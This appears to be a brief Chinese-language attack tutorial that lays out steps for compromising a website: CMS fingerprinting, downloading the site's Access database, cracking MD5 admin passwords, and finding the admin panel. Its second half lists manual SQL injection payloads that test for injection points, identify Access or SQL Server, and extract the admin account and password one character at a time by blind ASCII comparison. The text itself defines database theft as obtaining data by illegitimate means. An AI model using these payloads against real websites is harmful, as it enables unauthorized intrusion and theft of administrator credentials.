步骤:
1.判断网站CMS类型
2.网站暴库漏洞
3.网站后台查找
4.网站管理员密码猜解
5.网站漏洞的利用
********************************
1.判断网站CMS类型:
使用工具:
1.wvs
2.wwwscan
3.站长工具 (tool.chinaz.com)
4.whatweb 5
.googlehack
判断目标:
1.脚本语言(asp,php... ...)
2.操作系统
3.搭建平台
4.cms厂商
暴库(个人理解):通过非法途径得到网站数据库,进行提权等操作。
数据库文件后缀名"XXX.mdb",网站数据库目录中若有'#',可将其转码为'%23'。
获得数据库文件之后运用破障软件得到登陆用户名和密码(md5解密)
判断注入点:
'
and 1=1
and 1=2
or 1=1
or 1=2
and 1=23
手工注入:
判断数据库类型:
and exists (select * from msysobjects)>0 access
and exists (select * from sysobjects)>0 sqlserver
判断数据库表
and exists (select * from admin)
判断账户密码长度
and (select len(admin) from admin)=5 如果返回正常说明管理员账户长度为5
and (select len(passworf) from admin)=5 猜解管理密码长度是否为5,输入大于小于符号判断长度区间
通过ascii码来判断管理员账号的第一个数据
and (select top 1 asc(mid(admin,1,1))from admin)>100 返回正常说明大于,不正常说明不大于